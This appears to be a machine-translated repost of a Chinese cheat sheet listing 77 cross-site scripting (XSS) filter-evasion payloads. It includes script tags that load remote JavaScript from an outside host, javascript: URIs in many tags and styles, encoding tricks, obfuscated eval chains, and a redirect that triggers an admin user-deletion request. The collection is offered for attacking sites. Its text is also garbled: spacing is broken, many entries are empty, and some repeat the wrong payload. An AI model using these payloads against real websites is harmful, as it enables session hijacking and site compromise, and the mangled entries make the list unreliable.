77 anger and 77 XSS Cases

Source: Internet
Author: User

I saw an XSS summary on a website, but it was actually an image version. What's the use of that? It made me dizzy. I looked through the original post; the one on T00Ls is also a repost, and the source cannot be found. The original author is welcome to claim it.
 
(1) Common XSS JavaScript injection
<Script src = http://2cto.com/XSS/xss.js> </SCRIPT>
 
(2) IMG tag XSS using JavaScript commands
<Script src = http://2cto.com/XSS/xss.js> </SCRIPT>
 
(3) IMG tag without semicolons and without quotation marks

 
(4) IMG tag, case insensitive

 
(5) HTML encoding (a semicolon is required)

 
(6) Malformed IMG tag
<SCRIPT> alert ("XSS") </SCRIPT> ">
 
(7) fromCharCode (calculator)

 
(8) Unicode encoding of UTF-8 (calculator)

 
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

 
(10) Hexadecimal encoding without semicolons (calculator)

 
(11) embedded tags that separate Javascript

 
(12) embedded encoding labels that separate Javascript

 
(13) embedded line breaks

 
(14) embedded carriage return

 
(15) embedded multi-line JavaScript injection, an extreme XSS example

 
(16) Working around restricted characters (must be on the same page)
<Script> z = 'document. '</script>
<Script> z = z + 'write (''</script>
<Script> z = z + '<script' </script>
<Script> z = z + 'src = ht '</script>
<Script> z = z + 'tp: // ww '</script>
<Script> z = z + 'W. shell' </script>
<Script> z = z + '. net/1.' </script>
<Script> z = z + 'js> </SC '</script>
<Script> z = z + 'ript> ") '</script>
<Script> eval (z) </script>
 
(17) null characters
Perl-e 'print " out
 
(18) Null characters 2. Null characters are basically useless in China, because there is nowhere to use them
Perl-e 'print '<SCR \ 0ip> alert (\ "XSS \") </SCR \ 0ept> ";'> out
 
(19) Spaces and meta characters before the IMG tag

 
(20) Non-alpha-non-digit XSS
<SCRIPT/xss src = "http://2cto.com/XSS/xss.js"> </SCRIPT>
 
(21) Non-alpha-non-digit XSS 2
<BODY onload! # $ % &()*~ + -_.,:;? @ [/| \] ^ '= Alert ("XSS")>
 
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC = "http://2cto.com/XSS/xss.js"> </SCRIPT>
 
(23) Double parentheses
<SCRIPT> alert ("XSS"); // </SCRIPT>
 
(24) No closing script tag (Firefox and similar browsers only)
<Script src = http://2cto.com/XSS/xss.js? <B>
 
(25) No closing script tag 2
<Script src = // 2cto.com/XSS/xss.js>
 
(26) half-open HTML/JavaScript XSS
 
(27) double angle brackets
<Iframe src = http://2cto.com/XSS.html <
 
(28) No single quotation marks, double quotation marks or semicolons
<SCRIPT> a =/XSS/
Alert (a. source) </SCRIPT>
 
(29) JavaScript code-Based Filtering
\ "; Alert ('xss ');//
 
(30) End the Title tag
</TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>
 
(31) Input Image
<Input src = "javascript: alert ('xss');">
 
(32) BODY Image
<Body background = "javascript: alert ('xss')">
 
(33) BODY Tag
<BODY ('xss')>
 
(34) IMG Dynsrc

 
(35) IMG Lowsrc

 
(36) BGSOUND
<Bgsound src = "javascript: alert ('xss');">
 
(37) STYLE sheet
<Link rel = "stylesheet" HREF = "javascript: alert ('xsss');">
 
(38) Remote Style Sheets
<Link rel = "stylesheet" HREF = "http://2cto.com/xss.css">
 
(39) List-style-image (style)
<STYLE> li {list-style-image: url ("javascript: alert ('xss')") ;}</STYLE> <UL> <LI> XSS
 
(40) IMG VBscript
</STYLE> <UL> <LI> XSS
 
(41) META url
<META HTTP-EQUIV = "refresh" CONTENT = "0;
URL = http: //; URL = javascript: alert ('xss'); ">
 
(42) Iframe
<Iframe src = "javascript: alert ('xss');"> </IFRAME>
 
(43) Frame
<FRAMESET> <frame src = "javascript: alert ('xsss');"> </FRAMESET>
 
(44) Table
<Table background = "javascript: alert ('xss')">
 
(45) TD
<TABLE> <td background = "javascript: alert ('xsss')">
 
(46) DIV background-image
<Div style = "background-image: url (javascript: alert ('xsss')">
 
(47) DIV background-image plus additional characters (1-32 & 34 & 39 & 160 & 8192-8 & 13 & 12288 & 65279)
<Div style = "background-image: url (javascript: alert ('xsss')">
 
(48) DIV expression
<Div style = "width: expression (alert ('xsss');">
 
(49) STYLE attribute with a split-up expression

 
(50) Anonymous STYLE tag (requirement: an opening angle bracket followed by a letter)
<Xss style = "xss: expression (alert ('xsss')">
 
(51) STYLE background-image
<STYLE>. XSS {background-image: url ("javascript: alert ('xsss')") ;}</STYLE> <
CLASS = XSS> </A>
 
(52) IMG STYLE
Exppression (alert ("XSS") '>
 
(53) STYLE background
<STYLE> <STYLE
Type = "text/css"> BODY {background: url ("javascript: alert ('xsss')")} </STYLE>
 
(54) BASE
<Base href = "javascript: alert ('xss'); //">
 
(55) EMBED tag: a Flash file containing XSS can be embedded
<Embed src = "http://2cto.com/XSS/xss.swf"> </EMBED>
 
(56) Use ActionScript in Flash to obfuscate your XSS code
a = "get";
b = "URL(\"";
c = "javascript:";
d = "alert('xss');\")";
eval(a + b + c + d);
 
(57) XML namespace. The HTC file must be on the same server as your XSS vector.
<HTML xmlns: xss>
<? Import namespace = "xss" implementation = "http://2cto.com/XSS/xss.htc">
<Xss: xss> XSS </xss: xss>
</HTML>
 
(58) If your JS is filtered out, you can put the JS code in an image and use that.
<Script src = ""> </SCRIPT>
 
(59) IMG embedded command, which can execute any command

 
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
 
(61) Escape symbol Filtering
<SCRIPT a = ">" SRC = "http://2cto.com/xss.js"> </SCRIPT>
 
(62)
<SCRIPT = ">" SRC = "http://2cto.com/xss.js"> </SCRIPT>
 
(63)
<SCRIPT a = ">" "SRC =" http://2cto.com/xss.js"> </SCRIPT>
 
(64)
<SCRIPT "a = '>'" SRC = "http://2cto.com/xss.js"> </SCRIPT>
 
(65)
<SCRIPT a = '> 'src = "http://2cto.com/xss.js"> </SCRIPT>
 
(66)
<SCRIPT a = "> '>" SRC = "http://2cto.com/xss.js"> </SCRIPT>
 
(67)
<SCRIPT> document. write ("<SCRI"); </SCRIPT> pt src = "http://2cto.com/xss.js">
</SCRIPT>
 
(68) URL Bypass
<A href = "http: // 127.0.0.1/"> XSS </A>
 
(69) URL Encoding
<A href = "http://2cto.com"> XSS </A>
 
(70) IP decimal
<A href = "http://3232235521"> XSS </A>
 
(71) IP hexadecimal
<A href = "http://0xc0.0xa8.0x00.0x01"> XSS </A>
 
(72) IP octal
<A href = "http://0300.0250.0000.0001"> XSS </A>
 
(73) Mixed Encoding
<A href = "h
Tt p: // 6 6.000146.0 × 7. 147/"> XSS </A>
 
(74) Omitting [http:]
<A href = "// www.2cto.com/"> XSS </A>
 
(75) Omitting [www]
<A href = "http://2cto.com/"> XSS </A>
 
(76) Absolute DNS
<A href = "http://www.bkjia.com./"> XSS </A>
 
(77) javascript Link
<A href = "javascript: document. location = 'HTTP: // www.bkjia.com/'"> XSS </A>
